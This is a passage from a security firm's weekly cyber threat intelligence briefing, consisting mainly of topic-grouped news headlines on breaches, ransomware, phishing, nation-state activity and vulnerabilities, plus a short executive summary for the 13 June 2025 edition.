240,000 Impacted by Data Breach at Eyecare Tech Firm Ocuco - SecurityWeek

Data Breach at Healthcare Services Firm Episource Impacts 5.4 Million People - SecurityWeek

Hacker steals 1 million Cock.li user records in webmail data breach

Ex-CIA Analyst Sentenced to 37 Months for Leaking Top Secret National Defence Documents

Public database exposed 184 million credentials including Microsoft, Facebook, Snapchat, and government account logins | TechRadar

Organised Crime & Criminal Actors

Cyber crime crackdown disrupts malware, infostealers, marketplaces across the globe | CyberScoop

Dutch police identify users as young as 11-year-old on Cracked.io hacking forum

Dutch police identify 126 Cracked.io users | Cybernews

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

Pro-Israel hackers hit Iran's Nobitex exchange, burn $90M in crypto

North Korean Hackers Deploy Python-Based Trojan Targeting Crypto - Infosecurity Magazine

Discord Invite Link Hijacking Delivers AsyncRAT and Skuld Stealer Targeting Crypto Wallets

US Seizes $7.74M in Crypto Tied to North Korea's Global Fake IT Worker Network

Insurance

How cyber insurers are adapting to the new ransomware playbook | Insurance Business America

Changing nature of cyber threat leads to ‘brittle’ risk landscape - Insurance Post

Third-party cyber attacks put spotlight on contingent business interruption coverage | Insurance Business America

Supply Chain and Third Parties

UBS Employee Data Reportedly Exposed in Third Party Attack - Infosecurity Magazine

ChainLink Phishing: How Trusted Domains Become Threat Vectors

Security Is Only as Strong as the Weakest Third-Party Link

'Water Curse' Targets Infosec Pros via Poisoned GitHub Repos

Third-party cyber attacks put spotlight on contingent business interruption coverage | Insurance Business America

‘No systems or users were compromised’: TCS clarifies as Marks & Spencer investigates cyber breach | Company Business News

Cloud/SaaS

The cloud broke last Thursday and it'll happen again - how to protect your business before then | ZDNET

M365 Copilot: New Zero-Click AI Flaw Allows Corporate Data Theft - Infosecurity Magazine

Threat Actor Abuses TeamFiltration for Entra ID Attacks

Google links massive cloud outage to API management issue

Why Denmark is dumping Microsoft Office and Windows for LibreOffice and Linux | ZDNET

German state ditches Microsoft for open-source software - NZ Herald

Tenable report shows that organisations are failing to configure storage effectively – and may have a false sense of security | IT Pro

Microsoft 365 security in the spotlight after Washington Post hack - Neowin

Sneaky Serpentine#Cloud slithers through Cloudflare tunnels • The Register

Outages

The cloud broke last Thursday and it'll happen again - how to protect your business before then | ZDNET

Google links massive cloud outage to API management issue

2 Insurers Say Ongoing Outages Are Not Caused by Ransomware

Encryption

Encryption Backdoors: The Security Practitioners’ View - SecurityWeek

Linux and Open Source

Why Denmark is dumping Microsoft Office and Windows for LibreOffice and Linux | ZDNET

German state ditches Microsoft for open-source software - NZ Herald

CISA Warns of Active Exploitation of Linux Kernel Privilege Escalation Vulnerability

New Linux Flaws Enable Full Root Access via PAM and Udisks Across Major Distributions

Passwords, Credential Stuffing & Brute Force Attacks

Russian Hackers Bypass Gmail MFA With App-Specific Password Ruse - SecurityWeek

Same Sea, New Phish: Russian Government-Linked Social Engineering Targets App-Specific Passwords - The Citizen Lab

North Korean APT Hackers Attacking Ukrainian Government Agencies to Steal Login Credentials

Social Media

Ofcom investigates 4chan for not protecting users from illegal content • Graham Cluley

Trump administration set to again waive TikTok ban • The Register

Meta Starts Showing Ads on WhatsApp After 6-Year Delay From 2018 Announcement

Regulations, Fines and Legislation

Ofcom investigates 4chan for not protecting users from illegal content • Graham Cluley

How CISOs Can Govern AI & Meet Evolving Regulations

Cyber security takes a big hit in new Trump executive order - Ars Technica

Trump administration set to again waive TikTok ban • The Register

SEC withdraws cyber rules for investment companies, advisers | CyberScoop

The Future of the SEC’s Cyber Security Disclosure Rules | DLA Piper - JDSupra

New Executive Order Modifies Cyber Security Requirements to Be Imposed on Federal Contractors and Subcontractors | WilmerHale - JDSupra

Federal cyber insurance backstop should be tied to expiring terrorism insurance law, report recommends | CyberScoop

Careers, Working in Cyber and Information Security

Employers are demanding too much from junior cyber recruits • The Register

AI is changing cyber security roles, and entry-level jobs are at risk - Help Net Security

ISC2 Report: Entry-Level Hiring Needs a Reset

The Triple Threat of Burnout: Overworked, Unsatisfied, Trapped

Building a Career as a Cyber Warfare Defender - DataBreachToday

Cyber Security Company Launches In-House 'University' Training Program

Law Enforcement Action and Take Downs

Cyber crime crackdown disrupts malware, infostealers, marketplaces across the globe | CyberScoop

Dutch police identify 126 Cracked.io users | Cybernews

GCHQ intern who took secret data home jailed - BBC News

Ransomware gang busted in Thailand hotel raid

Ryuk ransomware’s initial access expert extradited to the US

Law enforcement operation shut down dark web drug marketplace Archetyp Market

Operation Endgame: Do Takedowns & Arrests Matter?

Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

As Geopolitical Tensions Rise AI Is Amplifying the Threat of Global Cyber Warfare

Israeli Strikes Raise Fears of Cyber Attacks and Retaliation

Israel strikes Iran: A history of assassinations, sabotages, cyber attacks

Cyber weapons in the Israel-Iran conflict may hit the US • The Register

Cyber attacks against Israel increase since start of Iran conflict | The Jerusalem Post

UK ‘woefully’ unprepared for Chinese and Russian undersea cable sabotage, says report | Defence policy | The Guardian

Threats to the 2025 NATO Summit: Cyber, Influence, and Hybrid Risks

Protecting Civilians in Cyber Space: A UN Security Council Imperative • Stimson Center

Nation State Actors

Former CISA and NCSC Heads Warn Against Glamorizing Threat Actor Names - Infosecurity Magazine

China

UK ‘woefully’ unprepared for Chinese and Russian undersea cable sabotage, says report | Defence policy | The Guardian

China’s Spy Agencies Are Investing Heavily in AI, Researchers Say - The New York Times

How China Is Using Hackathons, Competitions to Build an Army of Hackers - Bloomberg

Former CISA and NCSC Heads Warn Against Glamorizing Threat Actor Names - Infosecurity Magazine

China Is Hacking Russia to Steal War Secrets - The New York Times

Telecom giant Viasat breached by China's Salt Typhoon hackers

State-sponsored hackers compromised the email accounts of several Washington Post journalists

Russia

Russia has a plan for long-term aggression against Europe - Kallas | УНН

EU's top diplomat warns that Russia has a plan for long-term aggression against Europe - Los Angeles Times

UK ‘woefully’ unprepared for Chinese and Russian undersea cable sabotage, says report | Defence policy | The Guardian

Russian gang’s cyber attack on blood services ‘harmed 170 patients’ - LBC

China Is Hacking Russia to Steal War Secrets - The New York Times

Russian Hackers Bypass Gmail MFA With App-Specific Password Ruse - SecurityWeek

Same Sea, New Phish: Russian Government-Linked Social Engineering Targets App-Specific Passwords - The Citizen Lab

Denmark deploys ‘saildrones’ in Baltic to protect undersea cables from Russia | Denmark | The Guardian

Suspected Russian hackers used new tactic against UK researcher | Reuters

Sweden says it is under cyber attack • Graham Cluley

Russia detects first SuperCard malware attacks skimming bank data via NFC | The Record from Recorded Future News

UAWire - Ukrainian hackers launch major cyber attacks disrupting Russian infrastructure and communications

Iran

Israeli Strikes Raise Fears of Cyber Attacks and Retaliation

Israel strikes Iran: A history of assassinations, sabotages, cyber attacks

Cyber Attacks against Israel increase since start of Iran conflict | The Jerusalem Post

Pro-Israel hackers hit Iran's Nobitex exchange, burn $90M in crypto

Companies Warned On Iranian Cyber Attacks - WSJ

Israel-Tied Predatory Sparrow Hackers Are Waging Cyber War on Iran’s Financial System | WIRED

Iran-Israel War Triggers a Maelstrom in Cyber Space

Iran’s internet goes offline amid claims of ‘enemy abuse’ • The Register

Iran's Cyber Army: Missing in Action

Pro-Israel hackers take credit for cyber attack on Iran's Bank Sepah

Cyber attack hits state-owned bank in Iran - Iraqi News

Iran experienced a near-total national internet blackout

Elon Musk turns on Starlink in Iran as Tehran shuts down internet | The Jerusalem Post

North Korea

North Korean hackers deepfake execs in Zoom call to spread Mac malware

North Korean Hackers Deploy Python-Based Trojan Targeting Crypto - Infosecurity Magazine

Protecting Civilians in Cyber Space: A UN Security Council Imperative • Stimson Center

US Seizes $7.74M in Crypto Tied to North Korea's Global Fake IT Worker Network

North Korean APT Hackers Attacking Ukrainian Government Agencies to Steal Login Credentials

Tools and Controls

Security Is Only as Strong as the Weakest Third-Party Link

Who's guarding the AI? Even security teams are bypassing oversight - Help Net Security

Ransomware Gangs Exploit Unpatched SimpleHelp Flaws to Target Victims with Double Extortion

Choosing a Clear Direction in the Face of Growing Cyber Security Demands - SecurityWeek

Former CISA and NCSC Heads Warn Against Glamorizing Threat Actor Names - Infosecurity Magazine

Tenable report shows that organisations are failing to configure storage effectively – and may have a false sense of security | IT Pro

How cyber insurers are adapting to the new ransomware playbook | Insurance Business America

CISOs flag gaps in GenAI strategy, skills, and infrastructure - Help Net Security

Fog ransomware attacks use employee monitoring tool to break into business networks | TechRadar

AI is changing cyber security roles, and entry-level jobs are at risk - Help Net Security

Cyber Security Strategy Shifts Amid Global Political Tensions

What is a compliance audit? (with an example checklist) | TechTarget

CISOs brace for a surge in domain-based cyber threats - Help Net Security

SAML vs. OAuth 2.0: Mastering the Key Differences - Security Boulevard

Third-party cyber attacks put spotlight on contingent business interruption coverage | Insurance Business America

Microsoft Quietly Disabled Windows Hello Facial Recognition in the Dark

Why a Layered Approach Is Essential for Cyber Security and Zero Trust - Security Boulevard

Mitigating AI Threats: Bridging the Gap Between AI and Legacy Security - SecurityWeek

Application security risk: How leaders can protect their businesses | IT Pro

Stop Anthropomorphizing AI and Secure It Like Software

The new attack surface: from space to smartphone - SpaceNews

Other News

‘We’re being attacked all the time’: how UK banks stop hackers | Banking | The Guardian

Why Legal Firms Are Vulnerable to Cyber Threats and How to Prevent the Risks | LawNews.co.uk

Threats to the 2025 NATO Summit: Cyber, Influence, and Hybrid Risks

Over Two Thirds of MSPs Hit by Multiple Breaches in Past Year, Survey Reveals - IT Security Guru

MSPs remain confident over security | Microscope

Bank of England loses hundreds of laptops amid rising cyber threat

WestJet: 'expect interruptions' online amid security snafu • The Register

This Is One of the Worst Things You Can Do at the Airport, According to Cyber Security Experts

Why Are Cyber Criminals Targeting Law Firms With Voice Phishing? | Law.com

Cyber Attacks on Humanitarian Orgs Jump Worldwide

'225,000,000,000 attacks per day': Computer users and gamers are significantly more at risk of cyber crime than at any other time in the past | PC Gamer

Survey of UK retailers shows lack of preparedness for cyber attacks | Logistics Matters

Only One In Four UK Retailers Feels ‘Highly Prepared’ To Handle Major Cyber Incident, Study Finds | ESM Magazine

M&S, Co-Op and Harrods got hit by a cyber attack: here's what retailers need to do to stop this | TechRadar

Spain says April's blackout was caused by multiple technical failures and rules out cyber attack | Euronews

The convergence of privacy AI and cyber security what fintech GCs should prioritize now - A&O Shearman

Vulnerability Management

Tenable report shows that organisations are failing to configure storage effectively – and may have a false sense of security | IT Pro

"We're done" - major government organisation slams Microsoft Teams as it drops Windows for good | TechRadar

Governments are ditching Windows and Microsoft Office — new letter reveals the "real costs of switching to Windows 11" | Windows Central

Vulnerabilities

Veeam Patches CVE-2025-23121: Critical RCE Bug Rated 9.9 CVSS in Backup & Replication

Code Execution Vulnerabilities Patched in Veeam, BeyondTrust Products - SecurityWeek

Critical Vulnerability Patched in Citrix NetScaler - SecurityWeek

High-Severity Vulnerabilities Patched by Cisco, Atlassian - SecurityWeek

New Linux Flaws Enable Full Root Access via PAM and Udisks Across Major Distributions

Google Chrome Zero-Day CVE-2025-2783 Exploited by TaxOff to Deploy Trinper Backdoor

Critical Vulnerability Exposes Many Mitel MiCollab Instances to Remote Hacking - SecurityWeek

Apple squashes zero-click bug used for spyware attacks • The Register

Palo Alto Networks fixed multiple privilege escalation flaws

Code Execution Vulnerabilities Patched in Veeam, BeyondTrust Products - SecurityWeek

BeyondTrust warns of pre-auth RCE in Remote Support software

Microsoft Quietly Disabled Windows Hello Facial Recognition in the Dark

AMD releases security update for Ryzen CPUs with TPM vulnerability - Techzine Global

Over 46,000 Grafana instances exposed to account takeover bug

Microsoft: June Windows Server security updates cause DHCP issues

ASUS Armoury Crate bug lets attackers get Windows admin privileges

Attackers actively exploit older TP-Link routers | Cybernews

Organisations Warned of Vulnerability Exploited Against Discontinued TP-Link Routers - SecurityWeek

Zyxel Firewall Vulnerability Again in Attacker Crosshairs - SecurityWeek

Hackers Exploit Langflow Flaw to Unleash Flodrix Botnet

SinoTrack GPS vulnerabilities may allow attackers to track, control vehicles - Help Net Security

Researchers Warn of AI Attacks After PoC Exploits Atlassian's AI Agent - Infosecurity Magazine

Sector Specific

Industry specific threat intelligence reports are available.

· Automotive

· Construction

· Critical National Infrastructure (CNI)

· Defence & Space

· Education & Academia

· Energy & Utilities

· Estate Agencies

· Financial Services

· FinTech

· Food & Agriculture

· Gaming & Gambling

· Government & Public Sector (including Law Enforcement)

· Health/Medical/Pharma

· Hotels & Hospitality

· Insurance

· Legal

· Manufacturing

· Maritime & Shipping

· Oil, Gas & Mining

· OT, ICS, IIoT, SCADA & Cyber-Physical Systems

· Retail & eCommerce

· Small and Medium Sized Businesses (SMBs)

· Startups

· Telecoms

· Third Sector & Charities

· Transport & Aviation

· Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Black Arrow Admin 15/06/2025 Black Arrow Admin 15/06/2025

Black Arrow Cyber Threat Intelligence Briefing 13 June 2025

Black Arrow Cyber Threat Intelligence Briefing 13 June 2025:

-Scattered Spider Uses Tech Vendor Impersonation and Phishing Kits to Target Helpdesks

-An Emerging Phishing Technique Exploits Trust in Browser-based Messages

-Cyber Attacks on Smartphones Hit New High – Here’s How to Stay Safe

-Distributed Denial of Service Attacks on Financial Sector Surge in Scale and Sophistication

-Cyber Resilience Begins Before the Crisis

-How Did Britain’s Food Supplies Become So Vulnerable?

-Europol Says Criminal Demand for Data is “Skyrocketing”

-AI Is a Data-Breach Time Bomb, Reveals New Report

-What Is Penetration Testing? Types, Processes, Tools, and Why It’s All Worth It

-Internet Infamy Drives the Com’s Crime Sprees

-China-Linked Threat Actor Targeted +70 Orgs Worldwide, SentinelOne Warns

-Here’s Why Ignoring Politics Is No Longer an Option for Cyber Defence

-UK to Join Up with Allies for Stronger Response to Putin’s ‘Grey Zone’ Warfare

Executive Summary

This week’s review starts with evolving cyber attack techniques including the targeting of IT and managed service providers to gain access to multiple firms through a single compromise, while other techniques include exploiting end-user trust in messages appearing in browsers, attacks on smartphones, and increasingly complex DDoS attacks. We also reflect on the need for all organisations to proactively plan for a cyber incident, and the need to improve cyber-resilience of food supplies.

Our analysis of specialist and other media highlights the threats that organisations face in protecting their data, with high criminal demand and sensitive data being exposed to insecure and unverified AI tools. We also include information on penetration testing, which is one of the key ways for organisations to identify and address vulnerabilities that can be exploited by attackers.

Finally, we include articles on developments within the attacker community, including groups of teenagers and young adults as well as nation states, and insights into the impact of geo-political developments on cyber security for organisations.

At Black Arrow, we believe organisations achieve the most appropriate security by taking a proactive, cross-functional approach to cyber resilience. This starts with board engagement and threat-informed decision-making, including managing risks that are currently being exploited through third parties such as IT and managed service providers.

Governance, Risk and Compliance

Rising strategic role of the CISO | Deloitte Insights

Prep for Layoffs Before They Compromise Security

Docuseries Explores Mental, Physical Hardships of CISOs

Investor behaviour in the wake of cyber's 'black swan' moment | Computer Weekly

The Silent Cyber Crisis Alarming Global Economies and Why It's Time for Collective Action | IBTimes

Cyber resilience begins before the crisis | Microsoft Security Blog

Threats

Ransomware, Extortion and Destructive Attacks

DragonForce Victimisation on the Rise | SC Media UK

Attackers exploit Fortinet flaws to deploy Qilin ransomware

Scattered Spider and DragonForce unite to cash in on M&S hacking

Scattered Spider Uses Tech Vendor Impersonation to Target Helpdesks - Infosecurity Magazine

Former Black Basta Members Use Microsoft Teams and Python Scripts in 2025 Attacks

Threat hunting case study: DragonForce | Intel 471

Fog ransomware attack uses unusual mix of legitimate and open-source tools

Agencies Release Actionable Guidance on Play Ransomware | Schwabe, Williamson & Wyatt PC - JDSupra

'PathWiper' Attack Hits Critical Infrastructure In Ukraine

LockBit panel data leak shows Chinese orgs among the most targeted - Help Net Security

South African man imprisoned after ransom demand against his former employer

Ransomware Victims

Scattered Spider and DragonForce unite to cash in on M&S hacking

M&S food sales growth collapses after cyber attack

M&S cyber attack should prompt retailers to focus on response

How did Britain’s food supplies become so vulnerable?

M&S restarts online orders after cyber attack - BBC News

Tax resolution firm Optima Tax Relief hit by ransomware, data leaked

Main distributor to Amazon’s Whole Foods hit by cyber attack

British Horseracing Authority targeted by cyber attack - BBC Sport

Phishing & Email Based Attacks

Cutting-Edge ClickFix Tactics Snowball

Study: 73% of founders can’t spot phishing emails | Cybernews

Employees repeatedly fall for vendor email compromise attacks - Help Net Security

New Atomic macOS Stealer Campaign Exploits ClickFix to Target Apple Users

What is asymmetric cyberattack? | Definition from TechTarget

AitM Phishing Attacks Targeting Microsoft 365 and Google to Steal Login Credentials

That ‘unsubscribe’ link is actually a hidden security risk — do this instead | Tom's Guide

Phishing Alert as Erie Insurance Reveals Cyber “Event” - Infosecurity Magazine

Business Email Compromise (BEC)/Email Account Compromise (EAC)

Employees repeatedly fall for vendor email compromise attacks - Help Net Security

Other Social Engineering

Cutting-Edge ClickFix Tactics Snowball

Help Desk Hoax: How Attackers Bypass Tech Defenses

Cybercriminals are turning stolen data into a thriving black market - Help Net Security

New Atomic macOS Stealer Campaign Exploits ClickFix to Target Apple Users

What is asymmetric cyberattack? | Definition from TechTarget

The 'red flag' Grindr users should watch out for to stay safe

FIN6 hackers pose as job seekers to backdoor recruiters’ devices

Fraud, Scams and Financial Crime

The 'red flag' Grindr users should watch out for to stay safe

145 criminal domains linked to BidenCash Marketplace seized - Help Net Security

Mastercard: Fraud attempts jump as retailers feel cyber attack sting

US files to seize $7.7M laundered by North Korean IT workers • The Register

Five plead guilty to laundering $36 million stolen in investment scams

44% of people encounter a mobile scam every single day, Malwarebytes finds | Malwarebytes

WordPress Sites Turned Weapon: How VexTrio and Affiliates Run a Global Scam Network

Amazon promises fake reviews crackdown after investigation by UK watchdog | Amazon | The Guardian

Artificial Intelligence

Godfather of AI Alarmed as Advanced Systems Quickly Learning to Lie, Deceive, Blackmail and Hack

Next-Gen Developers Are a Cybersecurity Powder Keg

AI threats leave SecOps teams burned out and exposed - Help Net Security

Cloud and AI drive efficiency, but open doors for attackers - Help Net Security

Cyber crime is surging. Will AI make it worse?

AI is a data-breach time bomb, reveals new report

What CISOs need to know about agentic AI - Help Net Security

AI agents sometimes act like rogue employees, and nearly no one is watching what they’re doing | TechRadar

Securing agentic AI systems before they go rogue - Help Net Security

UK ICO publishes AI and biometrics strategy | Computer Weekly

Enterprises stuck in AI pilot hell, says Chatterbox Labs • The Register

When Grok is wrong: The risks of AI chatbots spreading misinformation in a crisis - Bulletin of the Atomic Scientists

OpenAI Bans ChatGPT Accounts Used by Russian, Iranian and Chinese Hacker Groups

Malware

New Atomic macOS Stealer Campaign Exploits ClickFix to Target Apple Users

New Supply Chain Malware Operation Hits npm and PyPI Ecosystems, Targeting Millions Globally

CISO who helped unmask Badbox warns: Version 3 is coming • The Register

Interpol Targets Infostealers: 20,000 IPs Taken Down, 32 Arrested, 216,000 Victims Notified - SecurityWeek

FIN6 Uses AWS-Hosted Fake Resumes on LinkedIn to Deliver More_eggs Malware

Supply chain attack hits Gluestack NPM packages with 960K weekly downloads

Two Distinct Botnets Exploit Wazuh Server Vulnerability to Launch Mirai-Based Attacks

React Native Aria Packages Backdoored in Supply Chain Attack - SecurityWeek

Malicious NPM Packages Disguised as Express Utilities Allow Attackers to Wipe Systems - SecurityWeek

Dangerous new MacOS malware is targeting Apple users everywhere - here's what you need to know | TechRadar

DanaBot malware operators exposed via C2 bug added in 2022

Bots/Botnets

CISO who helped unmask Badbox warns: Version 3 is coming • The Register

New Mirai botnet infect TBK DVR devices via command injection flaw

Recently Disrupted DanaBot Leaked Valuable Data for 3 Years - SecurityWeek

Two Distinct Botnets Exploit Wazuh Server Vulnerability to Launch Mirai-Based Attacks

Mobile

Cyber attacks on smartphones hit new high - here's how to stay safe | TechRadar

44% of people encounter a mobile scam every single day, Malwarebytes finds | Malwarebytes

Millions of low-cost Android devices turn home networks into crime platforms - Ars Technica

Chinese phone hacks, user lapses create 'mobile security crisis' | Fortune

Blocking stolen phones from the cloud can but won't be done • The Register

Cops want Apple, Google to kill stolen phones remotely • The Register

Apple and Google clash with police and MPs over phone thefts - BBC News

Google patched bug leaking phone numbers tied to accounts

Denial of Service/DoS/DDoS

Don’t give hacktivists what they really want | CSO Online

DDoS Attacks on Financial Sector Surge in Scale and Sophistication - Infosecurity Magazine

Internet of Things – IoT

Millions of low-cost Android devices turn home networks into crime platforms - Ars Technica

CISO who helped unmask Badbox warns: Version 3 is coming • The Register

New Mirai botnet infect TBK DVR devices via command injection flaw

40,000 cameras expose feeds to datacenters, health clinics • The Register

I found terrifying smart home security holes and you probably have them too

Data Breaches/Leaks

Cyber criminals are turning stolen data into a thriving black market - Help Net Security

Europol Says Criminal Demand for Data is “Skyrocketing” - Infosecurity Magazine

Recently Disrupted DanaBot Leaked Valuable Data for 3 Years - SecurityWeek

AI is a data-breach time bomb, reveals new report

The Dark Web's Currency of Choice: Stolen Data - IT Security Guru

Legal aid lawyers face 'chaos' following cyber attack - as some left 'in tears' and... - LBC

Over 80,000 Microsoft Entra ID Accounts Targeted Using Open-Source TeamFiltration Tool

'Major compromise' at NHS temping arm never disclosed • The Register

Phishing Alert as Erie Insurance Reveals Cyber “Event” - Infosecurity Magazine

86 million AT&T customer records reportedly up for sale on the dark web | ZDNET

Experts found 4 billion user records online, the largest known leak of Chinese personal data from a single source

Over 4 billion user records leaked in "largest breach ever" - here's what you need to know | TechRadar

Insurer Exposed Drivers' Personal Information, Court Told - Law360

Organised Crime & Criminal Actors

Cyber criminals are turning stolen data into a thriving black market - Help Net Security

Europol Says Criminal Demand for Data is “Skyrocketing” - Infosecurity Magazine

Interpol Targets Infostealers: 20,000 IPs Taken Down, 32 Arrested, 216,000 Victims Notified - SecurityWeek

Cyber crime is surging. Will AI make it worse?

OpenAI Bans ChatGPT Accounts Used by Russian, Iranian and Chinese Hacker Groups

Five plead guilty to laundering $36 million stolen in investment scams

Cyber criminals turn to “residential proxy” services to hide malicious traffic

Internet infamy drives The Com's crime sprees | CyberScoop

Cyber crime news: How this Canadian hacker was caught

How Crime-As-A-Service Turned Hacking Into A Subscription Business

Hacking the Hackers: When Bad Guys Let Their Guard Down

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

Hacker arrested after exploiting 5,000 accounts in $4.5 million cryptojacking scheme | TechSpot

US accuses Russian crypto entrepreneur of money laundering and sanctions evasion

145 criminal domains linked to BidenCash Marketplace seized - Help Net Security

Insurance

Cyber insurance demand is rising, but not 'evenly': Beazley cyber head | Insurance Business America

MSSPs, MSPs See Growing Strategic Role in Cyber Insurance | MSSP Alert

Supply Chain and Third Parties

New Supply Chain Malware Operation Hits npm and PyPI Ecosystems, Targeting Millions Globally

M&S restarts online orders after cyber attack - BBC News

Main distributor to Amazon’s Whole Foods hit by cyber attack

CISOs urged to push vendors for roadmaps on post-quantum cryptography readiness | CSO Online

Third-party security weaknesses threaten Europe’s big banks | Computer Weekly

Supply chain attack hits Gluestack NPM packages with 960K weekly downloads

Cloud/SaaS

Over 80,000 Microsoft Entra ID Accounts Targeted Using Open-Source TeamFiltration Tool

Cloud and AI drive efficiency, but open doors for attackers - Help Net Security

AitM Phishing Attacks Targeting Microsoft 365 and Google to Steal Login Credentials

Former Black Basta Members Use Microsoft Teams and Python Scripts in 2025 Attacks

Google Cloud and Cloudflare hit by widespread service outages

Outages

Massive cloud outage knocks out internet services across the globe | ZDNET

‘Severe’ network outages costing $160bn globally | Computer Weekly

Encryption

CISOs urged to push vendors for roadmaps on post-quantum cryptography readiness | CSO Online

See How Much Faster a Quantum Computer Will Crack Encryption | WIRED

Quantum Computers Pose a Grave Risk to The Future. Here's Why. : ScienceAlert

Digital rights groups sound alarm on Stop CSAM Act | CyberScoop

Linux and Open Source

Unverified code is the next national security threat | CyberScoop

Passwords, Credential Stuffing & Brute Force Attacks

295 Malicious IPs Launch Coordinated Brute-Force Attacks on Apache Tomcat Manager

Social Media

The 'red flag' Grindr users should watch out for to stay safe

FIN6 Uses AWS-Hosted Fake Resumes on LinkedIn to Deliver More_eggs Malware

Regulations, Fines and Legislation

Trump cyber executive order takes aim at prior orders, secure software, more | CyberScoop

Banks Challenge Treasury on Cybersecurity Failures - The Global Treasurer

Digital rights groups sound alarm on Stop CSAM Act | CyberScoop

UK ICO publishes AI and biometrics strategy | Computer Weekly

Trump limits use of cyber rules to punish US hackers, election meddlers - Defense One

Trump to Keep Starlink at White House Despite Cyber Security Concern

Models, Frameworks and Standards

Enterprise SIEMs miss 79% of known MITRE ATT&CK techniques - Help Net Security

SIEMs Missing the Mark on MITRE ATT&CK Techniques

NIST Launches Updated Incident Response Guide - Security Boulevard

NIST Publishes New Zero Trust Implementation Guidance - Infosecurity Magazine

Data Protection

Security & data protection: when two become one | TechRadar

Careers, Working in Cyber and Information Security

Human vs digital therapy: AI falls short when IT pros need help | Computer Weekly

Rethinking Success in Security: Why Climbing the Corporate Ladder Isn't Always the Goal - SecurityWeek

Hands-On Skills Now Key to Landing Your First Cyber Role - Infosecurity Magazine

Law Enforcement Action and Take Downs

Hacker arrested after exploiting 5,000 accounts in $4.5 million cryptojacking scheme | TechSpot

145 criminal domains linked to BidenCash Marketplace seized - Help Net Security

Interpol Targets Infostealers: 20,000 IPs Taken Down, 32 Arrested, 216,000 Victims Notified - SecurityWeek

Operation Secure: INTERPOL dismantles 20,000+ malicious IPs in major cybercrime crackdown

Five plead guilty to laundering $36 million stolen in investment scams

Police arrests 20 suspects for distributing child sexual abuse content

South African man imprisoned after ransom demand against his former employer

Misinformation, Disinformation and Propaganda

When Grok is wrong: The risks of AI chatbots spreading misinformation in a crisis - Bulletin of the Atomic Scientists

Disinformation security is a major concern for cyber teams – here's what your business can do | IT Pro

Amazon promises fake reviews crackdown after investigation by UK watchdog | Amazon | The Guardian

Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

EU Prepares for Transnational Cyberattacks - DataBreachToday

UK to join up with allies for stronger response to Putin's 'grey zone' warfare

Over 70 Organizations Across Multiple Sectors Targeted by China-Linked Cyber Espionage Group

What would break first if hackers hit US infrastructure? | Cybernews

Nation State Actors

Ignoring politics is no longer an option for cyber pros | Cybernews

Advanced Persistent Threats (APTs) - Detection and Defense Strategies

EU Prepares for Transnational Cyberattacks - DataBreachToday

OpenAI Bans ChatGPT Accounts Used by Russian, Iranian and Chinese Hacker Groups

China

China-linked threat actor targeted +70 orgs worldwide, SentinelOne warns

Over 70 Organizations Across Multiple Sectors Targeted by China-Linked Cyber Espionage Group

Chinese hackers broke into US telecom earlier than previously known, Bloomberg reports | Reuters

Chinese phone hacks, user lapses create 'mobile security crisis' | Fortune

Russian Spies Are Suspicious of China, Even as Putin and Xi Grow Close - The New York Times

SentinelOne shares new details on China-linked breach attempt

Experts found 4 billion user records online, the largest known leak of Chinese personal data from a single source

Over 4 billion user records leaked in "largest breach ever" - here's what you need to know | TechRadar

Russia

Eastern Europe’s Cyber Reckoning: Russia’s Digital Threat Is Forcing a Strategic Shift - Inkstick

UK to join up with allies for stronger response to Putin's 'grey zone' warfare

Russian Spies Are Suspicious of China, Even as Putin and Xi Grow Close - The New York Times

Why Russia Should Fear Ukraine’s Advanced Intelligence Network - The National Interest

'PathWiper' Attack Hits Critical Infrastructure In Ukraine

How The Times Obtained Secret Russian Intelligence Documents - The New York Times

US accuses Russian crypto entrepreneur of money laundering and sanctions evasion

LockBit panel data leak shows Chinese orgs among the most targeted - Help Net Security

'Librarian Ghouls' Cyberattackers Strike at Night

North Korea

US files to seize $7.7M laundered by North Korean IT workers • The Register

Tools and Controls

Enterprise SIEMs miss 79% of known MITRE ATT&CK techniques - Help Net Security

SIEMs Missing the Mark on MITRE ATT&CK Techniques

Next-Gen Developers Are a Cybersecurity Powder Keg

Cyber resilience begins before the crisis | Microsoft Security Blog

CISOs call for operational threat intelligence integration - Help Net Security

Nearly all CISOs struggle with threat intelligence barriers: report

Advanced Persistent Threats (APTs) - Detection and Defense Strategies

NIST Launches Updated Incident Response Guide - Security Boulevard

Cyber insurance demand is rising, but not 'evenly': Beazley cyber head | Insurance Business America

AI threats leave SecOps teams burned out and exposed - Help Net Security

The massive, no-good concerns around agentic AI cybersecurity - Tech Monitor

Study: 73% of founders can’t spot phishing emails | Cybernews

Prep for Layoffs Before They Compromise Security

Europe just launched DNS4EU, a public DNS resolver with privacy and security options - gHacks Tech News

Why Threat Agents Must be Included in Cyber Security Risk Assessments - Security Boulevard

NIST Publishes New Zero Trust Implementation Guidance - Infosecurity Magazine

MSSPs, MSPs See Growing Strategic Role in Cyber Insurance | MSSP Alert

Inside the Mind of the Adversary: Why More Security Leaders Are Selecting AEV

Your Android phone is getting new security protections - and it's a big deal for enterprises | ZDNET

Microsoft Outlook to block more risky attachments used in attacks

ConnectWise to Rotate ScreenConnect Code Signing Certificates Due to Security Risks

Other News

Cyber criminals love this ancient Windows tool, but a little-known CLI utility is their new secret weapon | TechRadar

Europe just launched DNS4EU, a public DNS resolver with privacy and security options - gHacks Tech News

Investor behaviour in the wake of cyber's 'black swan' moment | Computer Weekly

What Held the Internet Together for 20 Years and Why It’s Now at Risk - Internet Society

EU Updates Cyber Crisis Blueprint to Strengthen Regional Response | MSSP Alert

EU to ‘step up’ on cyber security as dependence on US laid bare

What would break first if hackers hit US infrastructure? | Cybernews

Surge in Cyber Attacks Targeting Journalists: Cloudflare - SecurityWeek

Brussels Parliament hit by cyber-attack – DataBreaches.Net

Vulnerability Management

Security flaws in government apps go unpatched for years - Help Net Security

Vulnerabilities

Microsoft June 2025 Patch Tuesday fixes exploited zero-day, 66 flaws

Adobe Releases Patch Fixing 254 Vulnerabilities, Closing High-Severity Security Gaps

